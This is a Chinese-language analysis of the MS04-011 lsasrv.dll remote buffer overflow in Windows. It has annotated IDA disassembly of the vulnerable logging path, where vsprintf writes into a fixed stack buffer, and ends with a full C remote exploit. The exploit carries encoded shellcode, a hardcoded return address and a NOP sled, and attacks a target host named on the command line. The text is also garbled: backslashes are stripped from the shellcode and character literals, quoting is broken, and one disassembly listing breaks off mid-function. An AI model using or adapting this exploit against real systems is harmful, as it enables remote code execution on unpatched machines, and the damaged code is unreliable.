
Windowslsasrv.dll远程溢出分析


by: mslug#safechina.net
eEye的文档里已经分析得比较清楚了.这里贴一下相关的代码和exp.eEye提出重现这个漏洞最简单的方法是:改变DsRoleUpgradeDownlevelServer API中的指令,使传给DsRolepEncryptPasswordStart的第一个实参变为DsRoleUpgradeDownlevelServer的第九个形参,即将 .text:751AD5F7 lea eax, [ebp+var_34]
.text:751AD5FA push eax
.text:751AD5FB push 0
.text:751AD5FD call _DsRolepEncryptPasswordStart@24 改为 .text:751AD5F7 push eax
mov eax, [ebp+var_34]
push eax
nop
call _DsRolepEncryptPasswordStart@24 然后调用DsRoleUpgradeDownlevelServer就可以了.自己动手改一下吧,(靠,怎么有了破解的感觉 :)
最后感谢oyxin,本来已经不打算调这个东东了. :) 下面是有漏洞的代码部分: LSASRV!DsRolerUpgradeDownlevelServer

----_DsRolepLogPrintRoutine

----_DsRolepDebugDumpRoutine

----__imp__vsprintf
.text:7859B6D6 ; __stdcall DsRolerUpgradeDownlevelServer(x,x,x,x,x,x,x,x,x,x,x,x,x)
.text:7859B6D6 _DsRolerUpgradeDownlevelServer@52 proc near ; DATA XREF: .text:7855B93Co
.text:7859B6D6
.text:7859B6D6 var_40 = byte ptr -40h
.text:7859B6D6 var_28 = byte ptr -28h
.text:7859B6D6 var_20 = byte ptr -20h
.text:7859B6D6 var_18 = dword ptr -18h
.text:7859B6D6 var_14 = dword ptr -14h
.text:7859B6D6 Data = byte ptr -10h
.text:7859B6D6 var_C = dword ptr -0Ch
.text:7859B6D6 var_8 = dword ptr -8
.text:7859B6D6 var_4 = dword ptr -4
.text:7859B6D6 arg_0 = dword ptr 8
.text:7859B6D6 arg_4 = dword ptr 0Ch
.text:7859B6D6 arg_8 = dword ptr 10h
.text:7859B6D6 arg_C = dword ptr 14h
.text:7859B6D6 arg_10 = dword ptr 18h
.text:7859B6D6 arg_14 = dword ptr 1Ch
.text:7859B6D6 arg_18 = dword ptr 20h
.text:7859B6D6 arg_1C = dword ptr 24h
.text:7859B6D6 arg_20 = dword ptr 28h
.text:7859B6D6 arg_24 = dword ptr 2Ch
.text:7859B6D6 arg_28 = dword ptr 30h
.text:7859B6D6 arg_2C = dword ptr 34h
.text:7859B6D6 arg_30 = dword ptr 38h
.text:7859B6D6
.text:7859B6D6 push ebp
.text:7859B6D7 mov ebp, esp
.text:7859B6D9 sub esp, 40h
.text:7859B6DC mov eax, [ebp+arg_24]
.text:7859B6DF push ebx
.text:7859B6E0 mov [ebp+var_18], eax
.text:7859B6E3 mov eax, [ebp+arg_28]
.text:7859B6E6 push esi
.text:7859B6E7 push edi
.text:7859B6E8 mov [ebp+var_14], eax
.text:7859B6EB xor eax, eax
.text:7859B6ED lea edi, [ebp+var_28]
.text:7859B6F0 xor ebx, ebx
.text:7859B6F2 stosd
.text:7859B6F3 stosd
.text:7859B6F4 and byte ptr [ebp+var_C], bl
.text:7859B6F7 cmp [ebp+arg_4], ebx
.text:7859B6FA stosd
.text:7859B6FB stosd
.text:7859B6FC mov eax, [ebp+arg_30]
.text:7859B6FF mov [ebp+var_4], ebx
.text:7859B702 mov [ebp+var_8], ebx
.text:7859B705 mov [eax], ebx
.text:7859B707 jz loc_7859B93F
.text:7859B70D cmp [ebp+arg_C], ebx
.text:7859B710 jz loc_7859B93F
.text:7859B716 cmp [ebp+arg_10], ebx
.text:7859B719 jz loc_7859B93F
.text:7859B71F cmp [ebp+arg_14], ebx
.text:7859B722 jz loc_7859B93F
.text:7859B728 call _DsRolepInitializeLog@0 ; DsRolepInitializeLog()
.text:7859B72D push [ebp+arg_4]
.text:7859B730 push offset aDsrolerdcasdcD ; "DsRolerDcAsDc: DnsDomainName %ws "
.text:7859B735 push 4
.text:7859B737 pop esi
.text:7859B738 push esi
.text:7859B739 call _DsRolepLogPrintRoutine
.text:7859B73E mov eax, [ebp+arg_8]
.text:7859B741 add esp, 0Ch
.text:7859B744 cmp eax, ebx
.text:7859B746 jnz short loc_7859B74D
.text:7859B748 mov eax, offset aNull ; "(NULL)"
.text:785A059D _DsRolepLogPrintRoutine proc near ; CODE XREF: DsRolerDcAsDc(x,x,x,x,x,x,x,x,x,x,x,x,x,x,x)+ADp
.text:785A059D ; DsRolerDcAsDc(x,x,x,x,x,x,x,x,x,x,x,x,x,x,x)+BDp ...
.text:785A059D
.text:785A059D ; Variadic (cdecl) logging front-end, roughly:
.text:785A059D ;   DsRolepLogPrintRoutine(DWORD flags, const char *fmt, ...)
.text:785A059D ; It forwards (flags, fmt, &first_vararg) unchanged to the stdcall
.text:785A059D ; DsRolepDebugDumpRoutine, which expands fmt with vsprintf into a
.text:785A059D ; fixed 0x814-byte stack buffer with no length bound (call at 785A04FA).
.text:785A059D ; Nothing is validated here, so caller-supplied format operands -- e.g.
.text:785A059D ; the "%ws" DnsDomainName pushed at 7859B72D -- reach that buffer
.text:785A059D ; unbounded; this is the overflow path the page attributes to MS04-011.
.text:785A059D ; Return value (if any) is whatever DsRolepDebugDumpRoutine leaves in eax.
.text:785A059D ; IDA's "NumberOfBytesWritten" label for the first parameter is a
.text:785A059D ; mis-applied prototype name; the callee only tests bit 0 of it (785A04A2).
.text:785A059D
.text:785A059D NumberOfBytesWritten= dword ptr 4 ; first arg: flags word (callers push 4)
.text:785A059D arg_4 = dword ptr 8 ; second arg: printf-style format string
.text:785A059D arg_8 = dword ptr 0Ch ; third arg onward: format operands (varargs)
.text:785A059D
.text:785A059D lea eax, [esp+arg_8] ; eax = &first vararg, i.e. the va_list
.text:785A05A1 push eax ; int -- va_list for vsprintf
.text:785A05A2 push [esp+4+arg_4] ; int -- format string (+4: eax already pushed)
.text:785A05A6 push [esp+8+NumberOfBytesWritten] ; NumberOfBytesWritten -- flags word (+8: two pushes so far)
.text:785A05AA call _DsRolepDebugDumpRoutine@12 ; DsRolepDebugDumpRoutine(x,x,x) -- stdcall, pops its own 12 bytes
.text:785A05AF retn ; plain retn: the caller removes the varargs (cf. add esp, 0Ch at 7859B741)
.text:785A05AF _DsRolepLogPrintRoutine endp
.text:785A047E ; =============== S U B R O U T I N E =======================================
.text:785A047E
.text:785A047E ; Attributes: bp-based frame
.text:785A047E
.text:785A047E ; int __stdcall DsRolepDebugDumpRoutine(DWORD NumberOfBytesWritten,int,int)
.text:785A047E _DsRolepDebugDumpRoutine@12 proc near ; CODE XREF: _DsRolepLogPrintRoutine+Dp
.text:785A047E
.text:785A047E var_816 = byte ptr -816h
.text:785A047E var_815 = byte ptr -815h
.text:785A047E Buffer = byte ptr -814h
.text:785A047E var_813 = byte ptr -813h
.text:785A047E SystemTime = _SYSTEMTIME ptr -10h
.text:785A047E NumberOfBytesWritten= dword ptr 8
.text:785A047E arg_4 = dword ptr 0Ch
.text:785A047E arg_8 = dword ptr 10h
.text:785A047E
.text:785A047E push ebp
.text:785A047F mov ebp, esp
.text:785A0481 sub esp, 814h
.text:785A0487 push ebx
.text:785A0488 xor ebx, ebx
.text:785A048A cmp _DsRolepLogFile, ebx
.text:785A0490 jz loc_785A056F
.text:785A0496 push edi
.text:785A0497 push esi
.text:785A0498 xor esi, esi
.text:785A049A cmp dword_785B35B8, ebx
.text:785A04A0 jz short loc_785A04EC
.text:785A04A2 test byte ptr [ebp+NumberOfBytesWritten], 1
.text:785A04A6 jz loc_785A0574
.text:785A04AC mov esi, offset dword_78564F90
.text:785A04B1
.text:785A04B1 loc_785A04B1: ; CODE XREF: DsRolepDebugDumpRoutine(x,x,x)+101j
.text:785A04B1 ; DsRolepDebugDumpRoutine(x,x,x)+10Fj ...
.text:785A04B1 lea eax, [ebp+SystemTime]
.text:785A04B4 push eax ; lpSystemTime
.text:785A04B5 call ds:__imp__GetLocalTime@4 ; __declspec(dllimport) GetLocalTime(x)
.text:785A04BB movzx eax, [ebp+SystemTime.wSecond]
.text:785A04BF push esi
.text:785A04C0 push eax
.text:785A04C1 movzx eax, [ebp+SystemTime.wMinute]
.text:785A04C5 push eax
.text:785A04C6 movzx eax, [ebp+SystemTime.wHour]
.text:785A04CA push eax
.text:785A04CB movzx eax, [ebp+SystemTime.wDay]
.text:785A04CF push eax
.text:785A04D0 movzx eax, [ebp+SystemTime.wMonth]
.text:785A04D4 push eax
.text:785A04D5 lea eax, [ebp+Buffer]
.text:785A04DB push offset a02u02u02u02u02 ; "%02u/%02u %02u:%02u:%02u %s"
.text:785A04E0 push eax
.text:785A04E1 call ds:__imp__sprintf
.text:785A04E7 add esp, 20h
.text:785A04EA mov esi, eax
.text:785A04EC
.text:785A04EC loc_785A04EC: ; CODE XREF: DsRolepDebugDumpRoutine(x,x,x)+22j
.text:785A04EC push [ebp+arg_8]
.text:785A04EF lea eax, [ebp+esi+Buffer]
.text:785A04F6 push [ebp+arg_4]
.text:785A04F9 push eax
.text:785A04FA call ds:__imp__vsprintf
.text:785A0500 add esp, 0Ch
.text:785A0503 add esi, eax
.text:785A0505 jz short loc_785A051B
.text:785A0507 cmp [ebp+esi+var_815], 0Ah
.text:785A050F mov dword_785B35B8, 1
.text:785A0519 jz short loc_785A0521
.text:785A051B -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- /******************************************************************
* Windows Lsasrv.dll RPC Remote Exploit
* [MS04-011]
*
* Bug found by: eEye (CoOL!!! :)
*
* Author: mslug (a1476854#hotmail.com), All rights reserved.
*
* Version: 0.2
*
* Tested: Win2k pro en sp4
*
* Compile: cl winlsass.c
*
* Date: 22 Apr 2004
*******************************************************************/ #include <windows.h> /* from www.cnhonker.com */
unsigned char scode[] =
// decode
"xEBx10x5Fx4fx33xC9x66xB9x7Dx01x80x34x0Fx99xE2xFA"
"xEBx05xE8xEBxFFxFFxFF"
// shellcode
"x70x95x98x99x99xC3xFDx38xA9x99x99x99x12xD9x95x12"
"xE9x85x34x12xD9x91x12x41x12xEAxA5x12xEDx87xE1x9A"
"x6Ax12xE7xB9x9Ax62x12xD7x8DxAAx74xCFxCExC8x12xA6"
"x9Ax62x12x6BxF3x97xC0x6Ax3FxEDx91xC0xC6x1Ax5Ex9D"
"xDCx7Bx70xC0xC6xC7x12x54x12xDFxBDx9Ax5Ax48x78x9A"
"x58xAAx50xFFx12x91x12xDFx85x9Ax5Ax58x78x9Bx9Ax58"
"x12x99x9Ax5Ax12x63x12x6Ex1Ax5Fx97x12x49xF3x9AxC0"
"x71x1Ex99x99x99x1Ax5Fx94xCBxCFx66xCEx65xC3x12x41"
"xF3x9CxC0x71xEDx99x99x99xC9xC9xC9xC9xF3x98xF3x9B"
"x66xCEx75x12x41x5Ex9Ex9Bx99x99xACxAAx59x10xDEx9D"
"xF3x89xCExCAx66xCEx69xF3x98xCAx66xCEx6DxC9xC9xCA"
"x66xCEx61x12x49x1Ax75xDDx12x6DxAAx59xF3x89xC0x10"
"x9Dx17x7Bx62x10xCFxA1x10xCFxA5x10xCFxD9xFFx5ExDF"
"xB5x98x98x14xDEx89xC9xCFxAAx50xC8xC8xC8xF3x98xC8"
"xC8x5ExDExA5xFAxF4xFDx99x14xDExA5xC9xC8x66xCEx79"
"xCBx66xCEx65xCAx66xCEx65xC9x66xCEx7DxAAx59x35x1C"
"x59xECx60xC8xCBxCFxCAx66x4BxC3xC0x32x7Bx77xAAx59"
"x5Ax71x76x67x66x66xDExFCxEDxC9xEBxF6xFAxD8xFDxFD"
"xEBxFCxEAxEAx99xDAxEBxFCxF8xEDxFCxC9xEBxF6xFAxFC"
"xEAxEAxD8x99xDCxE1xF0xEDxCDxF1xEBxFCxF8xFDx99xD5"
"xF6xF8xFDxD5xF0xFBxEBxF8xEBxE0xD8x99xEExEAxABxC6"
"xAAxABx99xCExCAxD8xCAxF6xFAxF2xFCxEDxD8x99xFBxF0"
"xF7xFDx99xF5xF0xEAxEDxFCxF7x99xF8xFAxFAxFCxE9xED"
"x99xFAxF5xF6xEAxFCxEAxF6xFAxF2xFCxEDx99";
#define call_ebx 0x78542001 //lsasrv.dll int WINAPI (*DsRoleUpgradeDownlevelServer)
(DWORD, DWORD, DWORD, DWORD, DWORD, DWORD,
DWORD, DWORD, DWORD, DWORD, DWORD, DWORD); #define LEN 10000 char buf[LEN+1];
char sendbuf[(LEN+1)*2];
char buf2[2000];
char target2[200]; int main(int argc, char *argv[])
{
HMODULE hNetapi;
int ret;
int i;
char c, *target; if (argc < 2) {
printf("%s <target_host>", argv[0]);
return 0;
}

target = argv[1];

hNetapi = LoadLibrary("myNetapi.dll");
if (!hNetapi) {
printf("[-] Can"t load myNetapi32.dll. ");
exit(0);
}

(DWORD *)DsRoleUpgradeDownlevelServer = (DWORD *)GetProcAddress(hNetapi, "DsRoleUpgradeDownlevelServer");

if (!DsRoleUpgradeDownlevelServer) {
printf("[-] Can"t find function. ");
exit(0);
}

memset(buf, "x90", LEN);

memcpy(&buf[2840], "xebx06xebx06", 4);
*(DWORD *)&buf[2844] = call_ebx;
memcpy(&buf[2856], scode, strlen(scode));

for(i=0; i<LEN; i++) { //unicode
sendbuf[i*2] = buf[i];
sendbuf[i*2+1] = 0;
} memset(target2, 0, 100);
for(i=0; i<strlen(target); i++) {
target2[i*2] = target[i];
target2[i*2+1] = 0;
}
memset(buf2, 0, 2000);

DsRoleUpgradeDownlevelServer(&sendbuf[0], &buf2[0], &buf2[0], &buf2[0], &buf2[0], &buf2[0],
&buf2[0], &buf2[0], target2, &buf2[0], &buf2[0], &buf2[0]); return 0;
}

